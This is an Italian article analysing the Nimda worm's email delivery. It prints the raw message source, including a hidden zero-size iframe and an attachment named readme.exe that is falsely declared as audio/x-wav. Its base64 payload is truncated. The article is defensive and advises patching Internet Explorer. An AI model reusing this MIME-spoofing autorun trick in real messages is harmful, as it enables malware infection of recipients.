Questo articolo è uno speciale dedicato ad un nuovo virus/worm che colpisce i sistemi dotati di sistema operativo Windows, chiamato Nimda .
La particolarità di questo worm risiede nel fatto che viaggia come allegato ad un'e-mail, in grado di autoeseguirsi visualizzata da Outlook Express 5 o 5.01 senza SP2, infettando il sistema.
Ad una prima analisi del codice sorgente del messaggio, che è mostrato più in basso, si trova una certa analogia con altri worm già presenti. Tenta infatti di eseguire un file che infetterà poi il sistema, mascherando la richiesta come l'esecuzione di un file audio/wav.
Con questo escamotage , difatti, taglia via una fetta significativa di personal firewall, che di norma bloccano l'esecuzione di programmi allegati, non certo di file audio.
Analisi di un attacco
Per inciso, vi basta fare l'upgrade di IE alla versione 5.5 o meglio ancora alle 6 per stare sicuri, oppure applicare il SP ad IE 5.01 perchè siate praticamente al sicuro. Tuttavia, non è difficile che vi venga spontaneo premere su "Apri" (oppure che questa operazione venga fatta da qualcuno degli utenti della vostra LAN che mangari non ha molta dimestichezza con la sicurezza) e che quindi la frittata venga fatta.
Received: from ... From: <....> Subject: desktopdeskto.... MIME-Version: 1.0 Content-Type: multipart/related; type="multipart/alternative"; boundary="====_ABC1234567890DEF_====" X-Priority: 3 X-MSMail-Priority: Normal X-Unsent: 1 Message-Id: ... X-RCPT-TO: ... Date: ... X-UIDL: 285007901 Status: U --====_ABC1234567890DEF_==== Content-Type: multipart/alternative; boundary="====_ABC0987654321DEF_====" --====_ABC0987654321DEF_==== Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable <HTML><HEAD></HEAD><BODY bgColor=3D#ffffff> <b><iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0> </iframe></b> </BODY></HTML> --====_ABC0987654321DEF_====-- --====_ABC1234567890DEF_==== <b>Content-Type: audio/x-wav; name="readme.exe"</b> Content-Transfer-Encoding: base64 Content-ID: <EA4DMGBP9p> TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA2AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1v ZGUuDQ0KJAAAAAAAAAA11CFvcbVPPHG1TzxxtU88E6pcPHW1TzyZqkU8dbVPPJmqSzxytU88cbVO PBG1TzyZqkQ8fbVPPMmzSTxwtU88UmljaHG1TzwAAAAAAAAAAMpUCAEAAAB/UEUAAEwBBQB1Oqc7 [....] AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAA= --====_ABC1234567890DEF_====
Commenti
Per inserire un commento, devi avere un account.
Fai il login e torna a questa pagina, oppure registrati alla nostra community.